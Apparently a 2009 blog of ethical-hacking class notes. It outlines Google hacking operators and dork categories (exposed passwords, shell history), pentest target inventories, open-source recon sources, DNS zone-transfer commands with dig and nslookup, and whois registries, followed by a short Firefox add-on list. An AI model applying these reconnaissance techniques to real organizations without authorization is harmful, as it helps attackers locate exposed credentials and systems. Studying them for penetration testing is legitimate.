Gooscan (~2006) [Lin] ... can be found in BackTrack
Goolag (v1.0.0.41 Mar 2008) [cDc/Win]

Google Proxies

Dec 2006... Google stops giving out SOAP API keys (deprecated)
Mar 2009 AJAX API 'graduates' from Google Code
Aug 2009... Google will disable the SOAP API

Google Proxy Tools

AURA (API Usable / Re-usable Again)
EvilAPI (defunct?)

Thursday, May 7, 2009

Google Hacking

“Google, properly leveraged, has more intrusion potential than any hacking tool.” - Adrian Lamo (Grey Hat Hacker, hacked NY Times, Yahoo, etc.)

See this book: Google Hacking For Penetration Testers - Johnny Long

Google Searching Basics

Preferences and Advanced

Preferences
Language Tools
Advanced Search

Advanced Directives

site: (Searches only within a given domain)
[all]intext: (Shows pages with all terms in page text)
[all]inurl: (Shows pages whose URL matches)
[all]intitle: (Shows pages whose title matches)
filetype: (ext:) vs. searchterm
phonebook: (General)
bphonebook: (Business)
rphonebook: (Residential)
link: (Shows all sites linked to a given site)
related: (Shows similar pages [hit/miss])
cache: (Google cache)
info: (Cached + link: + related: ... Not very useful)
daterange: (Indexed by Google during dates within range) -Must always be a range - Must be in Julian Date form (Number of days since Jan 1, 4713 B.C.)
vs &as_qdr={h.d.w.m.y}[2..x]

Operators

""
(|) / (OR v. or)
(-) (+)
(.) (*)
(..) / numrange
(~)

Google Hacking Database

Available remote desktop systems
Default web material
Indexable directories
UserIDs and passwords
Shell history
GHDB of "GoogleDorks" (http://johnny.ihackstuff.com)

Inventory

Target

Name
IP Address(es)
OS
Open Ports
Known Vulnerabilities
Administrative Accounts / Passwords
Other Accounts / Passwords

How Discovered?

Findings

Objectives
Exploitation Attempts
Results
Obtained Flag (Pwnd?)

Web-based Recon

Target's own websites:

Press releases
White Papers
Design Documents
Sample deliverables
Open positions
Key people
Contacts

Related Sites:

Business partners, ISP, suppliers
Competitors, review sites

Public Databases:

SEC's Edgar database (Public Companies... http://www.sec.gov/edgar/quickedgar.htm)
Job Sites (monster.com, hotjobs.com, etc.)
Blogs
Social Networking Sites
Newsgroups
Wayback Machine

On/Off-line

Newspapers
Magazines
Etc.

DNS Interrogation

DNS Record Types (http://en.wikipedia.org/wiki/List_of_DNS_record_types)

A: IPv4 Address record
CNAME: Canonical Name (alias)
MX: Mail Exchange record (mail servers for domain)
NS: Name Server record (authoritative name server)
PTR: Pointer for inverse lookups record (reverse record)
SOA: Start of Authority record (server authoritative for zone)
TXT: Text record (arbitrary text string - often used vs. spam)
HINFO: Host Information record (formerly system type) - rarely used
RP: Responsible Person record (info of human) - rarely used
SRV: Service Locator record (host/port info - used for newer protocols instead of creating proto-specific records like MX) - rarely used

nslookup (+interactive mode)

server
set
- type=any
- [no]recurse
ls -d [> filename]
view

DNS Cache Snooping - Luis Grangia (http://www.sysvalue.com/ResourcesUser/docs/dns_cache_snooping.pdf)

dig [@global-server [domain] [type]

dig @ -t AXFR (All zone transfer)
dig @ -t IXFR= (Incremental zone transfer, retrieving records since SOA serial number was N)
+[no]recursive (recursive searches default)
Dig for Windows (http://www.nscan.org/dig.html)

DNSstuff.com & DNS Query Websites

http://member.dnsstuff.com/pages/tools.php
DNS Report (Improved, lots of info – but only trial free now)
Whois/IPWhois Lookup
IP Information (City, Country, etc.)
URL Deobfuscator
Traceroute

Whois Lookups

InterNIC -> Individual Registrar (sometimes more detail)

Web-based whois searches:

CLI 'whois':

Direct vs. Automatically Redirected
whois [-h HOST] OBJECT

IP Address Assignments:

ARIN (http://www.arin.net): North America

Max 256 results
Query-by-record-type:
- n: network address space
- a: automation system
- p: point of contact
- o: organization
- c: end-user customers
Query-by-attribute:
- @: match domain portion of an email address
- ! : match handle or id
- . : match by name
Display flags:
- + : FULL output (details for each match)
- - : LIST output (summary only)

RIPE NCC (http://www.ripe.net): Europe, Middle East, Central Asia
APNIC (http://www.apnic.net): Asia and Pacific Region
AUNIC (http://www.aunic.net): Australia
LACNIC (http://www.lacnic.net): Latin America and Caribbean
AfriNIC (http://www.afrinic.net): Africa

Reconnaissance

The following are reconnaissance techniques:

Hacking Techniques

As outlined in my Ethical Hacking Class:

Reconnaissance
Scanning
Exploitation
Maintaining Access (Malware)
Evading Detection

Wednesday, May 6, 2009

Firefox Add-on List

These are my favorite Firefox Add-ons:

Google Reader Watcher - Adds a notification on status bar that tells me how many unreader feeds I have waiting.
Hide Menubar - Hides the Menubar (a la IE7) to give yourself more screen to view.
OpenDownload - Gives you an option to open a downloaded file instead of just saving it locally.
Xmarks - Best bookmark/password manager I have found.
DownThemAll! - Awesome Download utility.
Office 2007 Black - Black theme if you are into that.
CHM Reader - Allows you to read Windows Help files in the browser.

Sunday, May 3, 2009

Windows Command Prompt Resources

Sites that give good information on Windows Command Prompt commands: